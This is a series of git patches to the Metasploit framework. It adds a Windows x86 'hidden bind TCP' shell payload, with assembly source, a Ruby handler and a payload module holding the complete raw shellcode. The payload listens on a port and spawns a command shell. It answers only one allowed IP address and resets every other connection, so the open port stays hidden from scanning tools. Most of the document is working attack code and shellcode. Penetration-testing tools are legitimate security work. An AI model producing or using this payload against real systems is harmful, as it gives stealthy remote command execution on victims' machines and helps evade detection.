From b4a22aa25d0635ab9204f0f4ae1886e7da034876 Mon Sep 17 00:00:00 2001 From: root Date: Thu, 20 Feb 2014 16:19:40 +0100 Subject: [PATCH 1/4] hidden bind shell payload --- .../x86/src/block/block_hidden_bind_tcp.asm | 90 +++++++ .../single/single_shell_hidden_bind_tcp.asm | 20 ++ lib/msf/core/handler/bind_hidden_tcp.rb | 231 ++++++++++++++++++ .../singles/windows/shell_hidden_bind_tcp.rb | 74 ++++++ 4 files changed, 415 insertions(+) create mode 100644 external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm create mode 100644 external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm create mode 100644 lib/msf/core/handler/bind_hidden_tcp.rb create mode 100644 modules/payloads/singles/windows/shell_hidden_bind_tcp.rb diff --git a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm new file mode 100644 index 0000000000..fa8f31681a --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm @@ -0,0 +1,90 @@ +;-----------------------------------------------------------------------------; +; Original Shellcode: Stephen Fewer (stephen_fewer@harmonysecurity.com) +; Modified version to add Hidden ACL support: Borja Merino (bmerinofe@gmail.com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (February 2014) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: EBP must be the address of 'api_call'. +; Output: EDI will be the newly connected clients socket +; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0) + +bind_tcp: + push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. + push 0x5F327377 ; ... + push esp ; Push a pointer to the "ws2_32" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "ws2_32" ) + + mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) + sub esp, eax ; alloc some space for the WSAData structure + push esp ; push a pointer to this stuct + push eax ; push the wVersionRequested parameter + push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" ) + call ebp ; WSAStartup( 0x0190, &WSAData ); + + push eax ; if we succeed, eax wil be zero, push zero for the flags param. + push eax ; push null for reserved parameter + push eax ; we do not specify a WSAPROTOCOL_INFO structure + push eax ; we do not specify a protocol + inc eax ; + push eax ; push SOCK_STREAM + inc eax ; + push eax ; push AF_INET + push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) + call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); + xchg edi, eax ; save the socket for later, don't care about the value of eax after this + + xor ebx, ebx ; Clear EBX + push ebx ; bind to 0.0.0.0 + push 0x5C110002 ; family AF_INET and port 4444 + mov esi, esp ; save a pointer to sockaddr_in struct + push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused) + push esi ; pointer to the sockaddr_in struct + push edi ; socket + push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" ) + call ebp ; bind( s, &sockaddr_in, 16 ); + + ; Hidden ACL Support ---------- + + push 0x1 ; size, in bytes, of the buffer pointed to by the "optval" parameter + push esp ; optval: pointer to the buffer in which the value for the requested option is specified + push 0x3002 ; level at which the option is defined: SOL_SOCKET + push 0xFFFF ; the socket option for which the value is to be set: SO_CONDITIONAL_ACCEPT + push edi ; socket descriptor + push 0x2977A2F1 ; hash( "ws2_32.dll", "setsockopt" ) + call ebp ; setsockopt(s, SOL_SOCKET, SO_CONDITIONAL_ACCEPT, &bOptVal, 1 ); + + push ebx ; backlog + push edi ; socket + push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" ) + call ebp ; listen( s, 0 ); + +condition: + push ebx ; dwCallbackData (ebx = 0, no data needed for the condition function) + call wsaaccept ; push the start of the condition function on the stack + mov eax, DWORD [esp+4] ; + mov eax, DWORD [eax+4] ; + mov eax, DWORD [eax+4] ; get the client IP returned in the stack + sub eax, 0x2101A8C0 ; compare the client IP with the IP allowed + jz return ; if equal returns CF_ACCEPT + xor eax, eax ; If not equal, the condition function returns CF_REJECT + inc eax +return: + retn 0x20 ; some stack alignment needed to return to mswsock + +wsaaccept: + push ebx ; length of the sockaddr = nul + push ebx ; struct sockaddr = nul + push edi ; socket descriptor + push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" ) + call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0) + cmp eax, -1 ; if error jump to condition function to wait for another connection + jz condition + + push edi ; push the listening socket to close + xchg edi, eax ; replace the listening socket with the new connected socket for further comms + push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" ) + call ebp ; closesocket( s ); + diff --git a/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm new file mode 100644 index 0000000000..cb2a14a38a --- /dev/null +++ b/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm @@ -0,0 +1,20 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 341 bytes +; Build: >build.py single_shell_bind_tcp +;-----------------------------------------------------------------------------; +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; Pop off the address of 'api_call' for calling later. +%include "./src/block/block_hidden_bind_tcp.asm" + ; By here we will have performed the bind_tcp connection and EDI will be out socket. +%include "./src/block/block_shell.asm" + ; Finish up with the EXITFUNK. +%include "./src/block/block_exitfunk.asm" diff --git a/lib/msf/core/handler/bind_hidden_tcp.rb b/lib/msf/core/handler/bind_hidden_tcp.rb new file mode 100644 index 0000000000..59a59af8ca --- /dev/null +++ b/lib/msf/core/handler/bind_hidden_tcp.rb @@ -0,0 +1,231 @@ +# -*- coding: binary -*- +module Msf +module Handler + +### +# +# This module implements the Bind Hidden TCP handler. This means that +# it will attempt to connect to a remote host on a given port for a period of +# time (typically the duration of an exploit) to see if a the payload has +# started listening. This can tend to be rather verbose in terms of traffic +# and in general it is preferable to use reverse payloads. +# +### +module BindHiddenTcp + + include Msf::Handler + + # + # Returns the handler specific string representation, in this case + # 'bind_hidden_tcp'. + # + def self.handler_type + return "bind_hidden_tcp" + end + + # + # Returns the connection oriented general handler type, in this case bind. + # + def self.general_handler_type + "bind" + end + + # + # Initializes a bind handler and adds the options common to all bind + # payloads, such as local port. + # + def initialize(info = {}) + super + + register_options( + [ + Opt::LPORT(4444), + OptAddress.new('RHOST', [false, 'The target address', '']), + OptAddress.new('AHOST', [true, 'IP address allowed', '192.168.1.33']), + ], Msf::Handler::BindHiddenTcp) + + self.conn_threads = [] + self.listener_threads = [] + self.listener_pairs = {} + end + + # + # Kills off the connection threads if there are any hanging around. + # + def cleanup_handler + # Kill any remaining handle_connection threads that might + # be hanging around + conn_threads.each { |thr| + thr.kill + } + end + + # + # Starts a new connecting thread + # + def add_handler(opts={}) + + # Merge the updated datastore values + opts.each_pair do |k,v| + datastore[k] = v + end + + # Start a new handler + start_handler + end + + # + # Starts monitoring for an outbound connection to become established. + # + def start_handler + + # Maximum number of seconds to run the handler + ctimeout = 150 + + if (exploit_config and exploit_config['active_timeout']) + ctimeout = exploit_config['active_timeout'].to_i + end + + # Take a copy of the datastore options + + ahost = datastore['AHOST'] + rhost = datastore['RHOST'] + lport = datastore['LPORT'] + + # Ignore this if one of the required options is missing + return if not ahost + return if not rhost + return if not lport + + # Only try the same host/port combination once + phash = rhost + ':' + lport.to_s + return if self.listener_pairs[phash] + self.listener_pairs[phash] = true + + # Start a new handling thread + self.listener_threads << framework.threads.spawn("BindTcpHandlerListener-#{lport}", false) { + client = nil + + print_status("Started Hidden bind handler") + + if (rhost == nil) + raise ArgumentError, + "RHOST is not defined; bind stager cannot function.", + caller + end + + stime = Time.now.to_i + + while (stime + ctimeout > Time.now.to_i) + begin + client = Rex::Socket::Tcp.create( + 'PeerHost' => rhost, + 'PeerPort' => lport.to_i, + 'Proxies' => datastore['Proxies'], + 'Context' => + { + 'Msf' => framework, + 'MsfPayload' => self, + 'MsfExploit' => assoc_exploit + }) + rescue Rex::ConnectionRefused + # Connection refused is a-okay + rescue ::Exception + wlog("Exception caught in bind handler: #{$!.class} #{$!}") + end + + break if client + + # Wait a second before trying again + Rex::ThreadSafe.sleep(0.5) + end + + # Valid client connection? + if (client) + # Increment the has connection counter + self.pending_connections += 1 + + # Start a new thread and pass the client connection + # as the input and output pipe. Client's are expected + # to implement the Stream interface. + conn_threads << framework.threads.spawn("BindTcpHandlerSession", false, client) { |client_copy| + begin + handle_connection(wrap_aes_socket(client_copy)) + rescue + elog("Exception raised from BindHiddenTcp.handle_connection: #{$!}") + end + } + else + wlog("No connection received before the handler completed") + end + } + end + + def wrap_aes_socket(sock) + if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == "" + return sock + end + + socks = Rex::Socket::tcp_socket_pair() + socks[0].extend(Rex::Socket::Tcp) + socks[1].extend(Rex::Socket::Tcp) + + m = OpenSSL::Digest::Digest.new('md5') + m.reset + key = m.digest(datastore["AESPassword"] || "") + + Rex::ThreadFactory.spawn('AESEncryption', false) { + c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') + c1.encrypt + c1.key=key + sock.put([0].pack('N')) + sock.put(c1.iv=c1.random_iv) + buf1 = socks[0].read(4096) + while buf1 and buf1 != "" + sock.put(c1.update(buf1)) + buf1 = socks[0].read(4096) + end + sock.close() + } + + Rex::ThreadFactory.spawn('AESEncryption', false) { + c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') + c2.decrypt + c2.key=key + iv="" + while iv.length < 16 + iv << sock.read(16-iv.length) + end + c2.iv = iv + buf2 = sock.read(4096) + while buf2 and buf2 != "" + socks[0].put(c2.update(buf2)) + buf2 = sock.read(4096) + end + socks[0].close() + } + + return socks[1] + end + + # + # Nothing to speak of. + # + def stop_handler + # Stop the listener threads + self.listener_threads.each do |t| + t.kill + end + self.listener_threads = [] + self.listener_pairs = {} + end + +protected + + attr_accessor :conn_threads # :nodoc: + attr_accessor :listener_threads # :nodoc: + attr_accessor :listener_pairs # :nodoc: +end + +end +end diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb new file mode 100644 index 0000000000..e63628d4bc --- /dev/null +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -0,0 +1,74 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/bind_hidden_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Windows + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline', + 'Description' => 'Listen for a connection from certain IP and spawn a command shell. + The shellcode will reply with a RST packet if the connection is not + comming from the IP defined in AHOST. This way the socket will appear + as "closed" helping us to keep our shellcode hidden from scanning tools.', + 'Author' => + [ + 'vlad902', # original payload module (single_shell_bind_tcp) + 'sd', # original payload module (single_shell_bind_tcp) + 'Borja Merino ' # Add Hidden ACL functionality + ], + 'License' => MSF_LICENSE, + 'References' => ['URL', 'http://www.youtube.com/watch?v=xYBuaVNQjGA&hd=1'], + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindHiddenTcp, + 'Session' => Msf::Sessions::CommandShell, + 'Payload' => + { + 'Offsets' => + { + 'LPORT' => [ 200, 'n' ], + 'AHOST' => [ 262, 'ADDR' ], + 'EXITFUNC' => [ 364, 'V' ], + }, + 'Payload' => + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" + + "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" + + "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" + + "\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" + + "\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" + + "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" + + "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" + + "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" + + "\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" + + "\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" + + "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" + + "\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" + + "\x68\xc2\xdb\x37\x67\xff\xd5\x6a\x01\x54\x68\x02\x30\x00\x00\x68" + + "\xff\xff\x00\x00\x57\x68\xf1\xa2\x77\x29\xff\xd5\x53\x57\x68\xb7" + + "\xe9\x38\xff\xff\xd5\x53\xe8\x17\x00\x00\x00\x8b\x44\x24\x04\x8b" + + "\x40\x04\x8b\x40\x04\x2d\xc0\xa8\x01\x21\x74\x03\x31\xc0\x40\xc2" + + "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x83\xf8\xff\x74" + + "\xd4\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" + + "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" + + "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" + + "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" + + "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a" + + "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05" + + "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" + } + )) + end + +end From 1fda6b86a1677b40369e02a4f7e02f83b7df8d3f Mon Sep 17 00:00:00 2001 From: root Date: Mon, 10 Mar 2014 12:13:10 +0100 Subject: [PATCH 2/4] Changed cmp eax by inc eax. Saved one byte --- .../x86/src/block/block_hidden_bind_tcp.asm | 5 ++-- .../singles/windows/shell_hidden_bind_tcp.rb | 25 +++++++++---------- 2 files changed, 15 insertions(+), 15 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm index fa8f31681a..3b708b9c48 100644 --- a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm +++ b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm @@ -80,8 +80,9 @@ wsaaccept: push edi ; socket descriptor push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" ) call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0) - cmp eax, -1 ; if error jump to condition function to wait for another connection - jz condition + inc eax + jz condition ; if error (eax = -1) jump to condition function to wait for another connection + dec eax push edi ; push the listening socket to close xchg edi, eax ; replace the listening socket with the new connected socket for further comms diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index e63628d4bc..c28daa8bd4 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -18,9 +18,9 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline', 'Description' => 'Listen for a connection from certain IP and spawn a command shell. - The shellcode will reply with a RST packet if the connection is not - comming from the IP defined in AHOST. This way the socket will appear - as "closed" helping us to keep our shellcode hidden from scanning tools.', + The shellcode will reply with a RST packet if the connections is not + comming from the IP defined in AHOST. This way the port will appear + as "closed" helping us to hide the shellcode.', 'Author' => [ 'vlad902', # original payload module (single_shell_bind_tcp) @@ -28,7 +28,6 @@ module Metasploit3 'Borja Merino ' # Add Hidden ACL functionality ], 'License' => MSF_LICENSE, - 'References' => ['URL', 'http://www.youtube.com/watch?v=xYBuaVNQjGA&hd=1'], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::BindHiddenTcp, @@ -39,7 +38,7 @@ module Metasploit3 { 'LPORT' => [ 200, 'n' ], 'AHOST' => [ 262, 'ADDR' ], - 'EXITFUNC' => [ 364, 'V' ], + 'EXITFUNC' => [ 363, 'V' ], }, 'Payload' => "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" + @@ -59,14 +58,14 @@ module Metasploit3 "\xff\xff\x00\x00\x57\x68\xf1\xa2\x77\x29\xff\xd5\x53\x57\x68\xb7" + "\xe9\x38\xff\xff\xd5\x53\xe8\x17\x00\x00\x00\x8b\x44\x24\x04\x8b" + "\x40\x04\x8b\x40\x04\x2d\xc0\xa8\x01\x21\x74\x03\x31\xc0\x40\xc2" + - "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x83\xf8\xff\x74" + - "\xd4\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" + - "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" + - "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" + - "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" + - "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a" + - "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05" + - "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" + "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x40\x74\xd6\x48" + + "\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" + + "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" + + "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56" + + "\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" + + "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68" + + "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" + + "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" } )) end From 3c95c021d003a741896a7e0d1ae04dffbde609e7 Mon Sep 17 00:00:00 2001 From: root Date: Mon, 10 Mar 2014 12:17:20 +0100 Subject: [PATCH 3/4] Reference added --- modules/payloads/singles/windows/shell_hidden_bind_tcp.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index c28daa8bd4..57f57f712a 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -28,6 +28,7 @@ module Metasploit3 'Borja Merino ' # Add Hidden ACL functionality ], 'License' => MSF_LICENSE, + 'References' => ['URL', 'http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html'], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::BindHiddenTcp, From 2be6b8befe3c797823bb6214bfbf27d9c8cb6dc2 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sat, 7 Jun 2014 14:34:20 +0100 Subject: [PATCH 4/4] Remove bind hidden handler --- lib/msf/core/handler/bind_hidden_tcp.rb | 231 ------------------ .../singles/windows/shell_hidden_bind_tcp.rb | 11 +- 2 files changed, 8 insertions(+), 234 deletions(-) delete mode 100644 lib/msf/core/handler/bind_hidden_tcp.rb diff --git a/lib/msf/core/handler/bind_hidden_tcp.rb b/lib/msf/core/handler/bind_hidden_tcp.rb deleted file mode 100644 index 59a59af8ca..0000000000 --- a/lib/msf/core/handler/bind_hidden_tcp.rb +++ /dev/null @@ -1,231 +0,0 @@ -# -*- coding: binary -*- -module Msf -module Handler - -### -# -# This module implements the Bind Hidden TCP handler. This means that -# it will attempt to connect to a remote host on a given port for a period of -# time (typically the duration of an exploit) to see if a the payload has -# started listening. This can tend to be rather verbose in terms of traffic -# and in general it is preferable to use reverse payloads. -# -### -module BindHiddenTcp - - include Msf::Handler - - # - # Returns the handler specific string representation, in this case - # 'bind_hidden_tcp'. - # - def self.handler_type - return "bind_hidden_tcp" - end - - # - # Returns the connection oriented general handler type, in this case bind. - # - def self.general_handler_type - "bind" - end - - # - # Initializes a bind handler and adds the options common to all bind - # payloads, such as local port. - # - def initialize(info = {}) - super - - register_options( - [ - Opt::LPORT(4444), - OptAddress.new('RHOST', [false, 'The target address', '']), - OptAddress.new('AHOST', [true, 'IP address allowed', '192.168.1.33']), - ], Msf::Handler::BindHiddenTcp) - - self.conn_threads = [] - self.listener_threads = [] - self.listener_pairs = {} - end - - # - # Kills off the connection threads if there are any hanging around. - # - def cleanup_handler - # Kill any remaining handle_connection threads that might - # be hanging around - conn_threads.each { |thr| - thr.kill - } - end - - # - # Starts a new connecting thread - # - def add_handler(opts={}) - - # Merge the updated datastore values - opts.each_pair do |k,v| - datastore[k] = v - end - - # Start a new handler - start_handler - end - - # - # Starts monitoring for an outbound connection to become established. - # - def start_handler - - # Maximum number of seconds to run the handler - ctimeout = 150 - - if (exploit_config and exploit_config['active_timeout']) - ctimeout = exploit_config['active_timeout'].to_i - end - - # Take a copy of the datastore options - - ahost = datastore['AHOST'] - rhost = datastore['RHOST'] - lport = datastore['LPORT'] - - # Ignore this if one of the required options is missing - return if not ahost - return if not rhost - return if not lport - - # Only try the same host/port combination once - phash = rhost + ':' + lport.to_s - return if self.listener_pairs[phash] - self.listener_pairs[phash] = true - - # Start a new handling thread - self.listener_threads << framework.threads.spawn("BindTcpHandlerListener-#{lport}", false) { - client = nil - - print_status("Started Hidden bind handler") - - if (rhost == nil) - raise ArgumentError, - "RHOST is not defined; bind stager cannot function.", - caller - end - - stime = Time.now.to_i - - while (stime + ctimeout > Time.now.to_i) - begin - client = Rex::Socket::Tcp.create( - 'PeerHost' => rhost, - 'PeerPort' => lport.to_i, - 'Proxies' => datastore['Proxies'], - 'Context' => - { - 'Msf' => framework, - 'MsfPayload' => self, - 'MsfExploit' => assoc_exploit - }) - rescue Rex::ConnectionRefused - # Connection refused is a-okay - rescue ::Exception - wlog("Exception caught in bind handler: #{$!.class} #{$!}") - end - - break if client - - # Wait a second before trying again - Rex::ThreadSafe.sleep(0.5) - end - - # Valid client connection? - if (client) - # Increment the has connection counter - self.pending_connections += 1 - - # Start a new thread and pass the client connection - # as the input and output pipe. Client's are expected - # to implement the Stream interface. - conn_threads << framework.threads.spawn("BindTcpHandlerSession", false, client) { |client_copy| - begin - handle_connection(wrap_aes_socket(client_copy)) - rescue - elog("Exception raised from BindHiddenTcp.handle_connection: #{$!}") - end - } - else - wlog("No connection received before the handler completed") - end - } - end - - def wrap_aes_socket(sock) - if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == "" - return sock - end - - socks = Rex::Socket::tcp_socket_pair() - socks[0].extend(Rex::Socket::Tcp) - socks[1].extend(Rex::Socket::Tcp) - - m = OpenSSL::Digest::Digest.new('md5') - m.reset - key = m.digest(datastore["AESPassword"] || "") - - Rex::ThreadFactory.spawn('AESEncryption', false) { - c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') - c1.encrypt - c1.key=key - sock.put([0].pack('N')) - sock.put(c1.iv=c1.random_iv) - buf1 = socks[0].read(4096) - while buf1 and buf1 != "" - sock.put(c1.update(buf1)) - buf1 = socks[0].read(4096) - end - sock.close() - } - - Rex::ThreadFactory.spawn('AESEncryption', false) { - c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') - c2.decrypt - c2.key=key - iv="" - while iv.length < 16 - iv << sock.read(16-iv.length) - end - c2.iv = iv - buf2 = sock.read(4096) - while buf2 and buf2 != "" - socks[0].put(c2.update(buf2)) - buf2 = sock.read(4096) - end - socks[0].close() - } - - return socks[1] - end - - # - # Nothing to speak of. - # - def stop_handler - # Stop the listener threads - self.listener_threads.each do |t| - t.kill - end - self.listener_threads = [] - self.listener_pairs = {} - end - -protected - - attr_accessor :conn_threads # :nodoc: - attr_accessor :listener_threads # :nodoc: - attr_accessor :listener_pairs # :nodoc: -end - -end -end diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index 57f57f712a..d768feaa1b 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/handler/bind_hidden_tcp' +require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' @@ -25,13 +25,13 @@ module Metasploit3 [ 'vlad902', # original payload module (single_shell_bind_tcp) 'sd', # original payload module (single_shell_bind_tcp) - 'Borja Merino ' # Add Hidden ACL functionality + 'Borja Merino ' # Add Hidden ACL functionality ], 'License' => MSF_LICENSE, 'References' => ['URL', 'http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html'], 'Platform' => 'win', 'Arch' => ARCH_X86, - 'Handler' => Msf::Handler::BindHiddenTcp, + 'Handler' => Msf::Handler::BindTcp, 'Session' => Msf::Sessions::CommandShell, 'Payload' => { @@ -69,6 +69,11 @@ module Metasploit3 "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" } )) + + register_options([ + OptAddress.new('AHOST', [true, "IP address allowed", nil]) + ]) end end +